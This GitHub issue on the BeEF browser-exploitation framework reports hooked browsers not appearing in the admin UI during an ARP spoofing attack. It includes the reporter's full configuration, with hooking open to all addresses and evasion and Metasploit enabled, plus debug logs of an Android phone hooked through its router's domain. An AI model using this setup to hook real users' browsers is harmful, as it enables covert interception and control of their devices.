Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Did hooking methods change #2906

Closed
ChillVibesMushroom opened this issue Aug 20, 2023 · 6 comments
Closed

Did hooking methods change #2906

ChillVibesMushroom opened this issue Aug 20, 2023 · 6 comments
Labels
Stale Used to mark issues with inactivity

Comments

@ChillVibesMushroom
Copy link

First Steps

  1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
    I don't see it

  2. Confirm that the wiki does not contain the answers you seek: https://github.com/beefproject/beef/wiki
    The wiki was followed as instructed

  3. Check the FAQ: https://github.com/beefproject/beef/wiki/FAQ
    I don't see anything that can help me

  4. BeEF Version:
    Browser Exploitation Framework (BeEF) 0.5.4.0

  5. Ruby Version:
    ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]

  6. Browser Details (e.g. Chrome v81.0):
    New Hooked Browser [id:1, ip:192.168.1.5, browser:FF-91, os:Linux-], hooked domain [192.168.1.5:3000]

Android Nokia G400 5G Chrome App Version 101.0.4951.41
Android Version 12

  1. Operating System (e.g. OSX Catalina):
    My Operating system is Linux kali 5.18.0-kali5-amd64 Dynamic Construction Class should not block last packet response #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07) x86_64 GNU/Linux

Configuration

Copyright (c) 2006-2023 Wade Alcorn - [email protected]

Browser Exploitation Framework (BeEF) - http://beefproject.com

See the file 'doc/COPYING' for copying permission

BeEF Configuration file

beef:
version: '0.5.4.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80

# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
    user:   "Concentrate"
    passwd: "Succeed"

# Interface / IP restrictions
restrictions:
    # subnet of IP addresses that can hook to the framework
    permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
    # subnet of IP addresses that can connect to the admin UI
    #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
    permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
    # subnet of IP addresses that cannot be hooked by the framework
    excluded_hooking_subnet: []
    # slow API calls to 1 every  api_attempt_delay  seconds
    api_attempt_delay: "0.05"

# HTTP server 
http:
    debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
    host: "0.0.0.0"
    port: "3000"

    # Decrease this setting to 1,000 (ms) if you want more responsiveness
    #  when sending modules and retrieving results.
    # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
    #  when hooking lots of browsers (50+).
    # Enabling WebSockets is generally better (beef.websocket.enable)
    xhr_poll_timeout: 1000

    # Public Domain Name / Reverse Proxy / Port Forwarding
    #
    # In order for the client-side BeEF JavaScript hook to be able to connect to BeEF,
    # the hook JavaScript needs to be generated with the correct connect-back details.
    #
    # If you're using a public domain name, reverse proxy, or port forwarding you must
    # configure the public-facing connection details here.

    #public:
    #    host: "beef.local" # public hostname/IP address
    #    port: "443" # public port (443 if the public server is using HTTPS)
    #    https: false # true/false

    # If using any reverse proxy you should also set allow_reverse_proxy to true below.
    # Note that this causes the BeEF server to trust the X-Forwarded-For HTTP header.
    # If the BeEF server is directly accessible, clients can spoof their connecting
    # IP address using this header to bypass the IP address permissions/exclusions.
    allow_reverse_proxy: false

    # Hook
    hook_file: "/hook.js"
    hook_session_name: "BEEFHOOK"

    # Allow one or multiple origins to access the RESTful API using CORS
    # For multiple origins use: "http://browserhacker.com, http://domain2.com"
    restful_api:
        allow_cors: false
        cors_allowed_domains: "http://browserhacker.com"

    # Prefer WebSockets over XHR-polling when possible.
    websocket:
        enable: false
        port: 61985 # WS: good success rate through proxies
        # Use encrypted 'WebSocketSecure'
        # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
        secure: true
        secure_port: 61986 # WSSecure
        ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
        ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

    # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
    web_server_imitation:
        enable: true
        type: "apache" # Supported: apache, iis, nginx
        hook_404: true # inject BeEF hook in HTTP 404 responses
        hook_root: false # inject BeEF hook in the server home page
    # Experimental HTTPS support for the hook / admin / all other Thin managed web services
    https:
        enable: false
        # In production environments, be sure to use a valid certificate signed for the value
        # used in beef.http.public (the domain name of the server where you run BeEF)
        key: "beef_key.pem"
        cert: "beef_cert.pem"

database:
    file: "beef.db"

# Autorun Rule Engine
autorun:
    # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
    # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
    # continue execution regardless of results.
    # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
    result_poll_interval: 300
    result_poll_timeout: 5000

    # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
    # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
    continue_after_timeout: true

# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false

# IP Geolocation
geoip:
    enable: true
    # GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
    database: '/usr/share/GeoIP/GeoLite2-City.mmdb'

# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
#       and can be enabled via their respective 'config.yaml' file
extension:
    admin_ui:
        enable: true
        base_path: "/ui"
    demos:
        enable: false
    events:
        enable: true
    evasion:
        enable: true
    requester:
        enable: true
    proxy:
        enable: true
    network:
        enable: true
    metasploit:
        enable: true
    social_engineering:
        enable: true
    xssrays:
        enable: true
  1. Have you made any changes to your BeEF configuration? Yes/No
    Yes
  2. Have you enabled or disabled any BeEF extensions? Yes/No
    Yes

Steps to Reproduce

  1. (eg. I ran install script, which ran fine)
  2. (eg. when launching console with './beef' I get an error as follows: )
    No Errors
  3. (eg. beef does not launch)
    Beef Launches and hooks the browser but never shows that the browser has been hooked, doesn't display the browser, and this is during an arp spoof attack.

How to enable and capture detailed logging

  1. Edit config.yaml in the root directory
    • If using Kali beef-xss the root dir will be /usr/share/beef-xss
  2. Update client_debug to true
    [23:18:06][>] Using legacy_build_beefjs
    [23:18:06][>] Excluding lib/jquery-1.12.4.min.js from core files obfuscation list
    [23:18:06][>] Excluding lib/json2.js from core files obfuscation list
    [23:18:06][>] Excluding lib/mdetect.js from core files obfuscation list
    [23:18:06][>] [Evasion] Loaded obfuscation chain: minify, base_64
    [23:18:06][>] [Evasion] Adding bootstrapper for technique: base_64
    [23:18:06][>] [Evasion] Applying technique: minify
    [23:18:08][>] [OBFUSCATION - Minifier] JavaScript has been minified
    [23:18:08][>] [Evasion] Applying technique: base_64
    [23:18:08][>] [OBFUSCATION - Base64] Javascript has been base64 encoded
    [23:18:08][>] [Evasion] Obfuscation completed (270990 bytes)
    [23:18:09][>] [INIT] Processing Browser Details...
    [23:18:09][>] [INIT] Processing Browser Details for session bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc
    [23:18:10][>] Event: 192.168.1.9 just joined the horde from the domain: 192.168.1.1:80
    [23:18:10][!] [Browser Details] Invalid browser name returned from the hook browser's initial connection.
    [23:18:10][!] [Browser Details] Invalid browser version returned from the hook browser's initial connection.
    [23:18:11][>] Event: 192.168.1.9 appears to have come back online
    [23:18:12][>] {"lastseen":"1692573491","count":1,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:12][!] [Browser Details] Invalid browser plugins returned from the hook browser's initial connection.
    [23:18:12][>] [INIT] Processing Browser Details...
    [23:18:12][>] {"lastseen":"1692573492","count":2,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:12][>] [INIT] Processing Browser Details for session bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc
    [23:18:12][>] Hooked browser [id:2] has IP [ip: 192.168.1.9]
    [23:18:13][>] {"lastseen":"1692573492","count":3,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:13][>] {"lastseen":"1692573493","count":4,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:14][>] {"lastseen":"1692573494","count":5,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:15][>] {"lastseen":"1692573495","count":6,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:15][] New Hooked Browser [id:2, ip:192.168.1.9, browser:UNKNOWN-101.0.0.0, os:Android-], hooked domain [192.168.1.1:80]
    [23:18:15][>] Hooked browser has network interface 127.0.0.1
    [23:18:16][>] {"lastseen":"1692573495","count":7,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:17][>] {"lastseen":"1692573496","count":8,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:18][>] {"lastseen":"1692573497","count":9,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:19][>] {"lastseen":"1692573498","count":10,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:20][>] {"lastseen":"1692573499","count":11,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:21][>] {"lastseen":"1692573500","count":12,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:22][>] {"lastseen":"1692573502","count":13,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:23][>] {"lastseen":"1692573503","count":14,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:24][>] {"lastseen":"1692573504","count":15,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:25][>] {"lastseen":"1692573505","count":16,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:26][>] {"lastseen":"1692573506","count":17,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:27][>] {"lastseen":"1692573507","count":18,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:28][>] {"lastseen":"1692573508","count":19,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:29][>] {"lastseen":"1692573509","count":20,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:30][>] {"lastseen":"1692573510","count":21,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:31][>] {"lastseen":"1692573511","count":22,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:32][>] {"lastseen":"1692573512","count":23,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:33][>] {"lastseen":"1692573513","count":24,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:34][>] {"lastseen":"1692573514","count":25,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:35][>] {"lastseen":"1692573515","count":26,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:36][>] {"lastseen":"1692573516","count":27,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
